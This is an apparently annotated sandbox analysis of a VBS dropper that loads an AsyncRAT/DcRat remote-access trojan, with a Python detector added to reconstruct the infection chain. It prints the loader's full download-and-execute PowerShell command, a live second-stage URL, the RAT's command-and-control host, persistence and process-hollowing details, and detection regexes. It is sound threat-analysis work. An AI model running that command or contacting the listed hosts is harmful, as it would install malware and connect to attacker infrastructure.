Analysis
max time kernel: 127s
max time network: 135s
platform: windows10-2004_x64
resource: win10v2004-en-20220113
submitted: 15-04-2022 12:16

Static task: static1
Behavioral task: behavioral1
Sample: WorkScope Details.vbs
Resource: win7-20220414-en
General
Target: WorkScope Details.vbs
Size: 31KB
MD5: 0284695a0af70e045cf579e015ebbdf4
SHA1: f0c20148cf96f0c81463e0224d80d4c67d7c1a04
SHA256: 78a742710aa79e0574a6faefecfaf851b64043889e75768f5de091cfc5a21dc0
SHA512: 6e54499711e1a0ee1ecd4679d7584027a424ba496d0bca868cc8e8d13d47097c4f0d65c0e4277c1457371b37e0c525a8ade33860cabd4e8869a438282af89e56
Malware Config
Extracted (second-stage download URL, taken from the PowerShell command the VBS launches): https://textbin.net/raw/mevlbkxshp
Extracted (RAT configuration):
family: asyncrat
version: 1.0.7
group (botnet ID): Default
C2: rick63.publicvm.com:5900
mutex: DcRatMutex_qwqdanchun (this is the default mutex of DcRat, the AsyncRAT fork by qwqdanchun; the YARA and Suricata hits below label the family AsyncRAT, which is consistent since DcRat shares its protocol and config format)
delay: 1
install: false
install_folder: %AppData%

Note that install=false only means the RAT itself does not install persistence; the Startup-folder drop listed under Signatures is performed by the PowerShell loader, not by the RAT.
Signatures

Meta Stealer (stealer)
Meta Stealer steals passwords stored in browsers, written in C++. This family tag is emitted by the sandbox; nothing else in this report (extracted config, YARA hits, Suricata alerts) corroborates it, so treat it as unconfirmed.

suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT)

Async RAT payload (2 IoCs)
resource: behavioral2/memory/4548-152-0x000000000040CBCE-mapping.dmp  yara_rule: asyncrat
resource: behavioral2/memory/4548-151-0x0000000000400000-0x0000000000412000-memory.dmp  yara_rule: asyncrat
Both dumps come from PID 4548 (RegSvcs.exe), the injection target; the 0x400000-0x412000 region (72 KB) is the in-memory AsyncRAT payload.

Blocklisted process makes network request (1 IoC)
flow 5  PID 3360  powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
Key value queried: \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  (WScript.exe)

Drops startup file (1 IoC)
File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicroSoftOutlookLauncher.vbs  (powershell.exe)
Persistence is established by the PowerShell loader (PID 1668) under a file name that imitates an Outlook component; the RAT config itself has install=false.

Suspicious use of SetThreadContext (1 IoC)
PID 1668 (powershell.exe) set thread context of PID 4548 (RegSvcs.exe), procid_target 88.
Together with the eight WriteProcessMemory events from 1668 into 4548 and RegSvcs.exe being started with no arguments, this is the process hollowing (RunPE) pattern typical of PowerShell loaders.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox labels this "likely ransomware behaviour", but the heuristic is generic and nothing else in this report (no file encryption, no ransom note) supports a ransomware classification.

Delays execution with timeout.exe (1 IoC)
PID 544  timeout.exe  (timeout 3, launched from C:\Users\Admin\AppData\Local\Temp\tmpE210.tmp.bat)

Suspicious behavior: EnumeratesProcesses (4 IoCs)
PID 3360 powershell.exe (2 events), PID 1668 powershell.exe (2 events)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Token: SeDebugPrivilege  PID 3360 powershell.exe
Token: SeDebugPrivilege  PID 1668 powershell.exe
Token: SeDebugPrivilege  PID 4548 RegSvcs.exe

Suspicious use of WriteProcessMemory (22 IoCs, grouped by source -> target)
2748 WScript.exe     -> 3360 powershell.exe   2 events  (procid_target 80)
3360 powershell.exe  -> 1668 powershell.exe   2 events  (procid_target 82)
1668 powershell.exe  ->  804 csc.exe          2 events  (procid_target 85)
 804 csc.exe         -> 3276 cvtres.exe       2 events  (procid_target 86)
1668 powershell.exe  -> 4548 RegSvcs.exe      8 events  (procid_target 88)
4548 RegSvcs.exe     ->  220 cmd.exe          3 events  (procid_target 93)
 220 cmd.exe         ->  544 timeout.exe      3 events  (procid_target 95)
Two or three writes from a parent into a child it has just created are normal and appear for every parent/child pair in this tree; the eight writes from 1668 into 4548, paired with the SetThreadContext event above, are the injection.
Processes
(depth markers from the original rendering are converted to indentation; each entry lists image, PID, command line and the signatures that fired on it)

C:\Windows\System32\WScript.exe  (PID 2748)
  cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WorkScope Details.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3360)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient] $Client = New-Object System.Net.WebClient; [Byte[]] $DownloadedData = $Client.DownloadData('https://textbin.net/raw/mevlbkxshp'); [String] $ByteToString = [System.Text.UTF8Encoding]::UTF8.GetString($DownloadedData); [System.IO.File]::WriteAllText('C:\Users\Public\mevlbkxshp.PS1', $ByteToString, [System.Text.Encoding]::UTF8); Invoke-Expression 'PowerShell -ExecutionPolicy RemoteSigned -File C:\Users\Public\mevlbkxshp.PS1'
    (first stage: downloads the second-stage script from textbin.net, writes it to C:\Users\Public, which every local user can write to, and launches it in a fresh PowerShell process)
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1668)
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\mevlbkxshp.PS1
      (second stage: the loader; drops the Startup .vbs and injects the RAT into RegSvcs.exe)
      - Drops startup file
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (PID 804)
        cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y0kudd0k\y0kudd0k.cmdline"
        (csc.exe with a .cmdline response file under a PowerShell parent is the footprint of Add-Type compiling C# at run time)
        - Suspicious use of WriteProcessMemory

        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (PID 3276)
          cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8923.tmp" "c:\Users\Admin\AppData\Local\Temp\y0kudd0k\CSC4FC5FF9075EC4108B0398759F6937AB3.TMP"
          (resource converter spawned by csc.exe as part of the compilation)

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  (PID 4548)
        cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        (started with no arguments, then written to and redirected via SetThreadContext by PID 1668: the hollowed host for the AsyncRAT payload; both YARA hits are on this process's memory)
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe  (PID 220)
          cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE210.tmp.bat""
          - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\timeout.exe  (PID 544)
            cmdline: timeout 3
            - Delays execution with timeout.exe
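The signatures and process tree above are enough to reconstruct the infection chain mechanically. The following is an added example, not part of the sandbox report: a small Python detector whose input is the process tree and the WriteProcessMemory / SetThreadContext counts transcribed from this page, and whose three rules (script host spawning a download-and-execute PowerShell, PowerShell compiling C# via csc.exe, and a hollowed argument-less child) are the editor's own, not the sandbox's signature logic. The creation-time write baseline of 3 is an assumption taken from the ordinary parent/child pairs in this report.

```python
"""Reconstruct the injection chain from a sandbox process tree plus memory events.

Added example: the PROCS, WRITES and SET_THREAD_CONTEXT data are transcribed
from the report above; the three detection rules are the editor's own.
"""
import re
from collections import Counter
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Optional


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str


# Process tree as reported (depth markers dropped, PIDs and command lines as on the page).
PROCS = {p.pid: p for p in [
    Proc(2748, None, r"C:\Windows\System32\WScript.exe",
         r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WorkScope Details.vbs"'),
    Proc(3360, 2748, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command '
         r"[System.Net.WebClient] $Client = New-Object System.Net.WebClient; "
         r"[Byte[]] $DownloadedData = $Client.DownloadData('https://textbin.net/raw/mevlbkxshp'); "
         r"[String] $ByteToString = [System.Text.UTF8Encoding]::UTF8.GetString($DownloadedData); "
         r"[System.IO.File]::WriteAllText('C:\Users\Public\mevlbkxshp.PS1', $ByteToString, [System.Text.Encoding]::UTF8); "
         r"Invoke-Expression 'PowerShell -ExecutionPolicy RemoteSigned -File C:\Users\Public\mevlbkxshp.PS1'"),
    Proc(1668, 3360, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\mevlbkxshp.PS1'),
    Proc(804, 1668, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
         r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y0kudd0k\y0kudd0k.cmdline"'),
    Proc(3276, 804, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
         r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8923.tmp" "c:\Users\Admin\AppData\Local\Temp\y0kudd0k\CSC4FC5FF9075EC4108B0398759F6937AB3.TMP"'),
    Proc(4548, 1668, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
         r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'),
    Proc(220, 4548, r"C:\Windows\SysWOW64\cmd.exe",
         r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE210.tmp.bat""'),
    Proc(544, 220, r"C:\Windows\SysWOW64\timeout.exe", r"timeout 3"),
]}

# "PID X wrote to memory of Y" events from the report, counted per (source, target).
WRITES = Counter({(2748, 3360): 2, (3360, 1668): 2, (1668, 804): 2, (804, 3276): 2,
                  (1668, 4548): 8, (4548, 220): 3, (220, 544): 3})
# "PID X set thread context of Y" events from the report.
SET_THREAD_CONTEXT = [(1668, 4548)]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_RE = re.compile(r"DownloadData|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)
EXECUTE_RE = re.compile(r"Invoke-Expression|\biex\b", re.I)
URL_RE = re.compile(r"https?://[^'\"\s)]+")
# Assumption: every ordinary parent/child pair in this report shows 2-3 creation-time
# writes; more than that plus SetThreadContext is treated as injection.
CREATION_WRITE_BASELINE = 3


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def has_no_arguments(proc: Proc) -> bool:
    """True when the command line is nothing but the (possibly quoted) image path."""
    return proc.cmdline.strip().strip('"').lower() == proc.image.lower()


def analyze(procs, writes, set_thread_context):
    findings = []
    for p in procs.values():
        parent = procs.get(p.ppid)
        if not parent:
            continue
        # Rule 1: script host -> PowerShell that downloads and immediately executes.
        if (basename(parent.image) in SCRIPT_HOSTS and basename(p.image) == "powershell.exe"
                and DOWNLOAD_RE.search(p.cmdline) and EXECUTE_RE.search(p.cmdline)):
            url = URL_RE.search(p.cmdline)
            findings.append({"rule": "script_host_download_execute", "pid": p.pid,
                             "url": url.group(0) if url else None})
        # Rule 2: PowerShell compiling C# at run time (Add-Type -> csc.exe @*.cmdline).
        if (basename(parent.image) == "powershell.exe" and basename(p.image) == "csc.exe"
                and ".cmdline" in p.cmdline.lower()):
            findings.append({"rule": "powershell_add_type_compile", "pid": p.pid})
    # Rule 3: SetThreadContext on a child that received more than creation-time writes
    # and was started without arguments, i.e. a hollowed host.
    for src, tgt in set_thread_context:
        target = procs.get(tgt)
        n = writes[(src, tgt)]
        if target and n > CREATION_WRITE_BASELINE and has_no_arguments(target):
            findings.append({"rule": "process_hollowing", "injector": src, "target": tgt,
                             "target_image": basename(target.image), "writes": n})
    return findings


if __name__ == "__main__":
    for finding in analyze(PROCS, WRITES, SET_THREAD_CONTEXT):
        print(finding)
```

Run as written it prints three findings: the download-and-execute PowerShell (PID 3360, with the textbin.net URL), the Add-Type compilation (PID 804) and the hollowing of RegSvcs.exe (PID 4548, eight writes from PID 1668). The write baseline matters: cmd.exe and timeout.exe also receive three writes each from their parents, so a rule keyed on "any WriteProcessMemory" would flag every process in the tree.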
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize: 3KB
MD5: 85df31411080f87203ed45b0dab4f336
SHA1: 5bf5b44ce38fa21c305c1a375da9e6ad84f48892
SHA256: e15527444c709b53eca9bc57890b4f6340fce53de1b5b0302a547f18da5974e5
SHA512: 963cf413d03add219bc832009f2ae5de426a4fae0633f02dfe90db4754f375e8bbe06d967bb6cbca59d1c41476126f1c78d2073adb5ba39ca420adafa3b0944c

Filesize: 1KB
MD5: a5c074e56305e761d7cbc42993300e1c
SHA1: 39b2e23ba5c56b4f332b3607df056d8df23555bf
SHA256: e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953
SHA512: c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

Filesize: 1KB
MD5: 9322b95f07b7e1e271c2fa8874a5f20c
SHA1: 612c8d9ac50efe4e8d76ac5b5f47811703277975
SHA256: fd2c5952ffa58b90417151f7bc0cd9f1c3e25201f07c36a093dcd3ebbae835ba
SHA512: 0833462403820790f163d88961930ec54a997cd470ae39f7cc6c6829579b83ebd7b86360a4db9a07e0997075375bd67d0a15890b0e0a59d3e9ed86db3ae30b6f

Filesize: 171B
MD5: cdd92e0efb357b3e483b7b5aaeda5639
SHA1: d8eedc466f9a8e87d1b02ea01f93bd36c45fd27d
SHA256: f490959c2d53c1a690890eb7c33a5749bfb71144f95e6fc5e151061be9a1f3f8
SHA512: 76b05516a5ebd9b14d63b4c69171f6022f795df690d9e64914ecbb4f82d369c0aae1ce085792af72948bb9bcee7f6eab8b8b61f593706fd341d0c69ccac5636e

Filesize: 11KB
MD5: e77a052b93a30c4998702632cfdbaec7
SHA1: aa5191f5285e831b26a462027e0ae6b7cf38f098
SHA256: 314754b99df20170e81f913348a42b43c8a18ef717be0415e6734836f25041f8
SHA512: 41e9d116d5a1fa75ed4bcc064fc674cf519009821dbfc3cf1cda640861b3acfb2d3a4e022a0bf58efae2b7dd362065bed9d6764fbd8f89fd304af0304e0814db

Filesize: 119KB
MD5: 295c2976c1c116f86593c92dc671862f
SHA1: f99d1953227b7d6ba569af28463bef765966eec3
SHA256: 5034918a1e8e29df87b61c95a05f1a3bf623a7b5f3b040076bacc448b0ee796d
SHA512: 9e179e68c4836b0c8d91157b71d0ca97ac3b787e71b5e4d7c84327aeb95ea5ea0599eb96be0630922e6cfaa33a2142615d4f1aa5dd7c8c8d9f663538c95cb15f

Filesize: 652B
MD5: 3385d2e703ca3664a07c88f8b0fecdef
SHA1: 4d4af9a126aeed0f7483f1c859ae8906397b20f2
SHA256: b1e9cb3a2ea5d7936927ad1e09f3069a50ed269bbefa12c0870480e8f4fb0a25
SHA512: 8459da4b43bd67a44a7febf7999b5d15dcf1430fc8fb96426ad953375ae92ef08281f0f03723cbc137a1029416c6be1c9c2d4a743cf8cdd28864f2aa8d3a303d

Filesize: 14KB
MD5: 5b28648a4e188b0ebdf2d5edcda61624
SHA1: faf0ba6c2ef8d8184881eda8a276796449969e1c
SHA256: e92acafc5a9dd128b120809aaf76178275c3d22b13fb7cc2f0d9c624befed1b1
SHA512: 972fca6205f8927363b751ff51c6cf07c3b42f7cbd8fbe12c1098df539118ecf3d3ce1af3b5d376c8710ed183786fc911279ff81941aba4202a11ca5670b9937

Filesize: 327B
MD5: 1c015fc25c1822842e0f90115b0481a4
SHA1: 7454885012a06b7adcc3fcbdd3575c7e44d0a52e
SHA256: 0586138145806ce5fb70898a1496bf8ce90dca81b118a28a6583c1b3db612ac6
SHA512: 0a93ebd7c7d7830f7969caf03ae9aed15be51a139bcb2624e7e1be5f634dc419fa3b0d2ed9be20a21456ea2cad7c0c192a8fb4d88e9ad36db756790eac70e059